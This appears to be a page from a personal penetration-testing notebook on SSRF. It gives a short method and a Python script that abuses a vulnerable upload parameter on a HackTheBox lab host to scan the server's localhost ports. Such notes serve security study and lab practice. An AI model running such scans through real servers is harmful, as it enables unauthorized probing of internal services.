🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Starter Kit
      • Linux
      • PowerShell
      • Git
      • 💾Regex
      • Network Analysis
        • curl
        • tcpdump
        • Nmap
        • 🦈Wireshark
      • Metasploit
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
      • JDWP
    • Code
      • Python Essentials
      • C & C++
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • GDB
      • Binaries
  • Web Exploitation
    • Web Enumeration
      • User Endpoints
      • Web Fuzzing
        • ffuf
        • feroxbuster
        • Gobuster
        • GoWitness
      • Web Servers
        • Apache
        • Nginx
        • Werkzeug
      • Databases
        • MySQL
        • NoSQL
          • MongoDB
          • Redis
      • Web Services/Frameworks
        • Wordpress
        • Laravel
        • Express
        • Magento
        • AIOHTTP
        • HashiCorp Vault
        • Tiny File Manager
        • Joomla
        • CMS Made Simple
        • 🌵Cacti
        • Tomcat
        • Zabbix
        • OpenNetAdmin
        • ImageMagick
    • Vulnerabilities
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Arbitrary Command Execution
      • SQLi
        • SQLmap
      • SSI
      • SSTI
      • LFI
      • XSS
    • Java-based web application
      • Struts
      • .WAR
      • pd4ml.jar
  • Cloud Exploitation
    • Kubernetes
    • AWS
  • Post Exploitation
    • File Transfer
      • Exfiltration
    • Credential Dumping
      • Thunderbird
    • Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Command Injection
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Docker
      • Abusing Wildcards
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Web Exploitation
  2. Vulnerabilities

SSRF

Server Side Request Reforgery

Methodology

  1. Watch for any unexpected redirects, especially to internal or private IP. These can often indicate a vulnerable SSRF endpoint.

  2. Use a listener to see if the server is initiating outbound connections. This helps confirm if the server is making requests to external resources.

  3. Pay special attention to which ports are open on the localhost, as they might indicate internal services that can be targeted.

  4. If you discover that there are open ports on internal services, try querying them via the vulnerable parameter. This could reveal sensitive information, such as metadata, headers, or responses that were not intended to be exposed.

  5. If the SSRF vulnerability exposes endpoints, like internal API, try querying those endpoints from the vulnerable parameter.

Port Scanner

  • Use this script to enumerate open ports on the localhost:

#!/usr/bin/python3
import requests

with open("a", 'wb') as f:
    f.write(b'')

for port in range(1, 65535):
    with open("a", 'rb') as file:
        data_post = {"bookurl": f"http://127.0.0.1:{port}"}   # Vulnerable Parameter
        data_file = {"bookfile": file}    # Mandatory Parameter
    try:
        r = requests.post("http://editorial.htb/upload-cover", files=data_file, data=data_post) # Vunerable URL
        if not r.text.strip().endswith('.jpeg'):     # Filtering response
            print(f"{port} --- {r.text}")
    except requests.RequestException as e:
        print(f"Error on port {port}: {e}")

  • Modify the parameters for your use case.

PreviousSession HijackingNextEval Injection

Last updated 4 months ago